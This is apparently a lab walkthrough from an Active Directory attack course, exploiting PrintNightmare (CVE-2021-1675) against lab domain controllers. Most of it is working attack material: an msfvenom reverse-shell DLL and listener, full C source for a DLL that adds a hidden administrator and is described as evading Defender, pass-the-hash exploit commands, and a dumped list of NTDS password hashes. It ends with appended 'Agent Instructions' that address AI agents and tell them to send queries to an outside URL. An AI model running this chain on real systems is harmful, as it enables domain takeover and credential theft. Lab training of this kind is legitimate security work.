# Exploit

### Exploit on vulnerable windows server 2019 (Bronx) <a href="#exploit-on-vulnerable-windows-server-2019-winterfell" id="exploit-on-vulnerable-windows-server-2019-winterfell"></a>

* Now try the same exploit on a vulnerable windows server 2019

```
python3 CVE-2021-1675.py north.newyork.local/elena.lopez:'princesa1'@north.newyork.local '\\192.168.56.31\ATTACKERSHARE\nightmare.dll'
```

<figure><img src="/files/pZZ4gQQkUcVmrIdnTIPU" alt=""><figcaption></figcaption></figure>

To exploit printnightmare we will first check if the spooler is active on targets

### Check spooler is active

```
crackmapexec smb 192.168.56.10-23 -M spooler
```

<figure><img src="/files/V2oURJZd8Po4Ad8JI3gv" alt=""><figcaption></figcaption></figure>

```
rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'
```

<figure><img src="/files/udLTWaUm6XzdoDZcUJAc" alt=""><figcaption></figcaption></figure>

```
sudo smbserver.py -smb2support "smb" /home/jefe/smb
```

<figure><img src="/files/GkJH0kdOIpaenxtOTMlh" alt=""><figcaption></figcaption></figure>

### Create Revershell and place it in the smb directory

```
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.56.31 LPORT=4444 -o /home/jefe/smb/remote.dll
```

<figure><img src="/files/W91MxlV6zd8fiSfCriRn" alt=""><figcaption></figcaption></figure>

### Setup the listener

```
msfconsole
use multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.31
set lport 4444
run
```

<figure><img src="/files/fACOxj1fhQK8naaPm5WK" alt=""><figcaption></figcaption></figure>

```
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\pnightmare2.dll'
```

### No shell.. It gets caught by defender

<figure><img src="/files/NLioTB591nogVmRbAAv6" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/6Z82MbJtVTKOm4J1l4VI" alt=""><figcaption></figcaption></figure>

### Lets craft a new dll

* Let’s change the payload with another code (source : <https://github.com/newsoft/adduser>
* Good (thing) to know : after some failures the spooler service will be stopped by defender and no more exploit for you until someone restart the server or the spooler service.

```
/*
 * ADDUSER.C: creating a Windows user programmatically.
 */

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <string.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <tchar.h>


DWORD CreateAdminUserInternal(void)
{
    NET_API_STATUS rc;
    BOOL b;
    DWORD dw;

    USER_INFO_1 ud;
    LOCALGROUP_MEMBERS_INFO_0 gd;
    SID_NAME_USE snu;

    DWORD cbSid = 256;    // 256 bytes should be enough for everybody :)
    BYTE Sid[256];

    DWORD cbDomain = 256 / sizeof(TCHAR);
    TCHAR Domain[256];

    // Create user
    memset(&ud, 0, sizeof(ud));

    ud.usri1_name        = _T("yournightmare");                // username
    ud.usri1_password    = _T("Jusbrowsing123!");             // password
    ud.usri1_priv        = USER_PRIV_USER;                   // cannot set USER_PRIV_ADMIN on creation
    ud.usri1_flags       = UF_SCRIPT | UF_NORMAL_ACCOUNT;    // must be set
    ud.usri1_script_path = NULL;

    rc = NetUserAdd(
        NULL,            // local server
        1,                // information level
        (LPBYTE)&ud,
        NULL            // error value
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

   _tprintf(_T("NetUserAdd OK\r\n"), rc, rc);

    // Get user SID
    b = LookupAccountName(
        NULL,            // local server
        ud.usri1_name,   // account name
        Sid,             // SID
        &cbSid,          // SID size
        Domain,          // Domain
        &cbDomain,       // Domain size
        &snu             // SID_NAME_USE (enum)
    );

    if (!b) {
        dw = GetLastError();
        _tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
        return dw;
    }

    // Add user to "Administrators" local group
    memset(&gd, 0, sizeof(gd));

    gd.lgrmi0_sid = (PSID)Sid;

    rc = NetLocalGroupAddMembers(
        NULL,                    // local server
        _T("Administrators"),
        0,                        // information level
        (LPBYTE)&gd,
        1                        // only one entry
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

    return 0;
}

//
// DLL entry point.
//

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateAdminUserInternal();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// RUNDLL32 entry point
#ifdef __cplusplus
extern "C" {
#endif

__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    CreateAdminUserInternal();
}

#ifdef __cplusplus
}
#endif

// Command-line entry point.
int main()
{
    return CreateAdminUserInternal();
}
```

* with this payload we can bypass defender and add our user as administrator

### Compile

```
sudo apt-get install gcc-mingw-w64
wget https://raw.githubusercontent.com/newsoft/adduser/master/adduser.c
```

```
x86_64-w64-mingw32-gcc -shared -opnightmare2.dll adduser.c -lnetapi32
```

* relaunch the exploit

```
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\yournightmare.dll'

```

<figure><img src="/files/l9NXPtkKYxqRQdZK9dM7" alt=""><figcaption></figcaption></figure>

### dumpy dumpy dumpy love love

```
crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
SMB         maryland.local  445    BALTIMORE        [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB         maryland.local  445    BALTIMORE        [+] maryland.local\yournightmare:Jusbrowsing123! (Pwn3d!)
SMB         maryland.local  445    BALTIMORE        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         maryland.local  445    BALTIMORE        Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB         maryland.local  445    BALTIMORE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         maryland.local  445    BALTIMORE        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:10f39f5a270977c56ac002b2c9cd660f:::
SMB         maryland.local  445    BALTIMORE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         maryland.local  445    BALTIMORE        vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB         maryland.local  445    BALTIMORE        carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:e205909d5d55a6d75365f15defbf27fb:::
SMB         maryland.local  445    BALTIMORE        marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB         maryland.local  445    BALTIMORE        joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB         maryland.local  445    BALTIMORE        teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB         maryland.local  445    BALTIMORE        sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB         maryland.local  445    BALTIMORE        pnightmare2:1115:aad3b435b51404eeaad3b435b51404ee:c103cafa49983dbcf3d8a1c951f46347:::
SMB         maryland.local  445    BALTIMORE        yournightmare:1116:aad3b435b51404eeaad3b435b51404ee:7b82840d460325f21d39ffdb471536f9:::
SMB         maryland.local  445    BALTIMORE        BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:0067621d2cb3ac05314b36ee408c7e51:::
SMB         maryland.local  445    BALTIMORE        SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:da0edcfd9de34981b3bad4979882ec22:::
SMB         maryland.local  445    BALTIMORE        newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
SMB         maryland.local  445    BALTIMORE        [+] Dumped 15 NTDS hashes to /home/jefe/.cme/logs/BALTIMORE_maryland.local_2023-03-08_223947.ntds of which 12 were added to the database
```

<figure><img src="/files/O86oMtHHrTRebCBKa3mc" alt=""><figcaption></figcaption></figure>

#### cleanup <a href="#cleanup" id="cleanup"></a>

```
xfreerdp /u:yournightmare /p:Jusbrowsing123! /v:192.168.56.12 /size:80%  /cert-ignore
```

* After the exploitation you will find your dlls inside : `C:\Windows\System32\spool\drivers\x64\3`

<figure><img src="/files/GxXaGKHyXmz5OieYOgLX" alt=""><figcaption></figcaption></figure>

* And also inside : `C:\Windows\System32\spool\drivers\x64\3\Old\{id}\`

<figure><img src="https://mayfly277.github.io/assets/blog/GOAD/traces_old.png" alt=""><figcaption></figcaption></figure>

* Don’t forget to clean up ;)

  <br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/exploiting-with-users/printnightmare-baltimore/exploit.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.